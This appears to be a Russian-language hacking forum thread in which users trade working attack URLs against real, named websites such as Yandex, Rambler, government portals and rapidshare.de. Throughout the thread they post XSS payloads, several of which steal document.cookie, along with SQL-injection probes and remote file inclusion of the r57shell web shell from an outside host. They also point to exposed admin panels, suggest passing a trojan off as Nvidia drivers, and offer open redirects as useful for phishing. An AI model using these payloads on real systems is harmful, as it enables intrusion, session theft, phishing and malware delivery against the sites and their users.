http://www.coca-cola.kz/index.php?p='

http://www.ziv.ru/fmessages.asp?iid=><h1>HACKED</h1>

http://www.government.gov.ru/search/search.html?query="><script>alert('VectorG')</script>&page=1&book=0&he_id=38&pres_he_id=38

http://www.americasarmy.com/includes/bumper.php?goto="><script>alert('america_sucks')</script>

http://sotoman.ru/forum/show_msg.php?postid=3457<script src=http://site.ru/script.js></script>
Надо писать без кавычек все кавычки фильтруются

http://www.annualreports.ru/load.php?link='
sql инъекция

Нагуглил тут немного
Если никому не пригодится - помидорами не бросаться
-----------------------------
_http://www.mff.org/publications/publications.taf?page=bebebe'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression '(P1.ID=bebebe') ORDER BY 25 DESC'.

_http://www.archaeological.org/webinfo.php?page='
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/aia/public_html/webinfo.php on line 11

_http://www.jedit.org/index.php?page=%00
_http://www.prestosoft.com/ps.asp?page=bebebe%00
_http://phppgadmin.sourceforge.net/?page=%00
_http://www.ourdocuments.gov/content.php?flash=false&page=%00
вдруг кто расковыряет?

_http://www.swrcb.ca.gov/rwqcb3/Admin/
вот еще - немного мыльников в зоне gov и может еще что-то чего я не разглядел

_http://www.agriya.com/demo/paidmail/admin/
_http://copyforsale.com/mail/
_http://www.software-trading.de/liste.asp?Titel=Backup&sql=WHERE(Kategorie%20IN('B ackup'))%20--

_http://theory.lcs.mit.edu/~cis/cpl/backup.tar.gz
(не качал - не знаю)
----------------EOF------------------------

ТУТ вход в админку slovari.yandex.ru .... нужен только логин и пасс)))

_http://www.malls.ru/index.cfm?error=%3Cscript%3Ealert(/AC%20team/)%3C/script%3E%3Cfont%20color=green%3EAC%20TEAM%20%3C/font%3E


Сцыла

Для СИ покатит, да и не только
http://www.nvidia.com/content/licens...грузить
Дальше юзеру останется нажать кнопку согласия... Можно впарить трояна под видом драиверов от нВидеа очень новых и хороших... А еще лучше это дрова склеенные с трояном, лежащие на каком-нить сайте... Вобщем можно придумать...

_http://svn.matroska.org/svn/
_http://vision.rambler.ru/srch/?sort=0&set=vision&words="><script>alert(/VectorG/)</script>

_http://www.fo-ma.ru/view.php?id=83661&img=%3Cscript%3Ealert(document.c ookie)%3C/script%3E

_http://vision.rambler.ru/srch/?sort=0&set=vision&control_charset=%CA%EE%ED%F2%F0 %EE%EB%FC&words=%22%3E%3Cscript%3Ealert%28document .cookie%29%3C%2Fscript%3E

_http://www.hedegaard.nu/image/set.php
_http://www.aleviler.biz/hpmaker/index.php?p=http://rst.void.ru/download/r57shell.txt?

_http://www.hedegaard.nu/image/set.php


Шелл тут прикольный .Я думал все юзают r57shell 124

http://suncity.combats.ru/enter.pl?step=1&add=1&login='><script>alert(/testing_by_censored!/)</script>>

http://capitalcity.combats.ru/enter.pl?login="><script>alert(/testing_by_censored!/)</script>&step=2&reminder=1234567

----------

http://rrc.territory.ru/register1.php?next=1&code=&num=&edit%5BNICK%5D=">< script>alert(/testing_by_censored!/)</script>

http://rrc.territory.ru/error.php?msg=Внимание!%20Всем%20иг� �окам%20надо%20пройти%20заново %20систему%20регистрации!%20p.s. Проходить%20ее%20надо%20на%20anti chat.ru%20=)

----------

http://forum.siemens-club.ru/member.php?Action=viewprofile&username=<script>ale rt(/testing_by_censored!/)</script>

_http://www.schooljournals.net/index.php?output=CommentsPage(PHP CODE)

exmpl:

_http://www.schooljournals.net/index.php?output=CommentsPage(phpinfo())

Стоит фильтрация на все спецсимволы. Как обходить - читаем http://forum.antichat.ru/thread18219.html

http://www.mirt-service.ru/constructor.php?manufacturer=1'

http://mp3plus.ru/album.php?id=4796&art=1247'

только что, случано нашел (работает только в IE)

_http://www.yandex.ru/yandsearch?text=gLAnce_was_here&stype="><script>al ert('found_by_gLAnce')</script>
_http://images.yandex.ru/yandsearch?rpt="><script>alert('found_by_gLAnce')</script>&text=xaxa

делаемся так. Знаю что некоторые XSS уже выкладывали но всетаки удобно когда все собрано в одно место
XSS НА ИЗВЕСТНЫХ RUSS-ПОИСКОВИКАХ

Yandex.RU - Internet Explorer
_http://www.yandex.ru/yandsearch?text=gLAnce_was_here&stype="><script>al ert('found_by_gLAnce')</script>
_http://images.yandex.ru/yandsearch?rpt="><script>alert('found_by_gLAnce')</script>&text=xaxa
_http://news.yandex.ru/yandsearch?rpt=nnews2&grhow=clutop&text=sasa&doSea rch="><script>alert('found')</script>

Rambler.RU
_http://www.rambler.ru/db/news/msg.html?mid='"><script>alert('found_by_gLAnce')</script>
_http://weather.rambler.ru/index.html?search=<script>alert('found_by_gLAnce') </script>
_http://tv.rambler.ru/index.html?channel_id="><script>alert('found_by_gL Ance')</script>
_http://foto.rambler.ru/srch?control_charset=huy&sort=0&set=photo&words="> <script>alert('found_by_gLAnce')</script>
_http://horoscopes.rambler.ru/day.html?day=1%22%3E%3Cscript%3Ealert%28%27found_b y_gLAnce%27%29%3C%2Fscript%3E&month=4&year=1965&ge nder=f
_http://www.rambler.ru/db/news/news.html?s="><script>alert(found_by_gLAnce)</script>
_http://cla.rambler.ru/?action=login&error[l_login][value]=privet"><script>javascript:alert(document.cookie) </script>
_http://olymp2006.rambler.ru/winners.html?day=http://olymp2006.rambler.ru/shedule.html?day=%3Cscript%3Ealert(/XSS/)%3C/script%3E

KM.RU
_http://go.km.ru/index.asp?idr=4&ids=&wdv=0&mrv=1&dti=0&dtv=6&idt=& ann=1&srt=0&itp=2&osq=%3Cscript%3Ealert+%28found_b y_gLAnce%29%3C%2Fscript%3E&P1=&P2=&P3=&ext=0&opt=0 &hlp=0&sr=0&sq=%3Cscript%3Ealert+%28%27found_by_gL Ance%27%29%3C%2Fscript%3E
_http://conference.km.ru/add_question.asp?id="><script>alert('found_by_gLAn ce')</script>
вобщем на км.ру полно css, все писать сюда не буду

Aport.RU
_http://www.aport.ru/help/?p="><script>alert%20('found-by-gLAnce')</script>
_http://ec.aport.ru/scripts/template.dll?r="><script>alert%20('i_vot_tak_vot') </script>&That=goods&Base=eshop&Rt=2&Tn=
_http://sm.aport.ru/scripts/template.dll?That=std&r=\"><script>alert%20(/found_by_gLAnce/)</script>

http://www.mon.gov.ua

вбиваем в поиск "><script>alert(document.cookie)</script> и наслаждаемся резалтом :)

http://www.mon.gov.ua/phpbb/docs/ -- смотрим резалт (для ленивых -

Warning: Failed opening 'phpbb/docs//main.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/spool/www.mstu.gov.ua/main.php on line 205) ),
немного подумав уже наталкивает на мысли =)

_http://www.hedegaard.nu/index.php?p=http://k1on.nm.ru/conf.php сс что спер чей то шелл своего нету)))

_http://wordstat.yandex.ru/advq?rpt=ppc&shw="><script>alert%20(/found_by_gLAnce/)</script>

_http://www.plati.ru/asp/pay.asp?id_d=11111&searchstr=sa&agent="><script>al ert('found_by_gLAnce')</script>

_http://www.plod.ru/search.php?search=%3Ch1%3ETEST%20AC%20TEAM%20%3C/h1%3E3E&x=0&y=0

Xss на rapidshare.de
http://rapidshare.de/en/forgotpw.html
Не фильтруется поле email.

POST rapidshare.de/cgi-bin/forgotpw.cgi HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: rapidshare.de
Content-Length: 65
Connection: Close
Pragma: no-cache

email=<script>alert('XSS')%3B</script>

трахающиеся невесты.. только толку 0
_http://officegirls.ru/cgi-bin/showpic.cgi?act=show&pg=2&id=<script>alert('opa ;-) by cy4_')</script>&ctg=Brides&c=2

__http://antharas.ru/?id=95&lo=1&hi='
__http://antharas.ru/?id=95&mid=12081'
__http://www.uinzz.com/stat/click.php?http://www.yandex.ru/ (думаю для фишеров полезно будет)
__http://dkcs.void.ru/index.php?module=read&action=0 (даж не баг, просто улыбнуло)
__http://www.truckmaster.ru/catalog.phtml?dir=1&subdir=6'

Xss на icq.rambler.ru

Не фильтруются: ipath, iname, alt,
Вроде еще не выкладывали.

_http://www.securitylab.ru/bitrix/redirect.php?event1=gateway_click&event2=news&even t3=266774&goto=http://ya.ru/
небольшая уловка для фишеров...

__http://www.office-tnt.ru/staff/workers/?8131'
чё то меня на тнт потянуло...

XSS
оплатна.info

http://www.oplata.info/delivery/inf_purse.asp?id_i=615238&wm_id=111111111111&ninv= 15730705&rnd="><Script>alert('found_by_gLAnce')</script>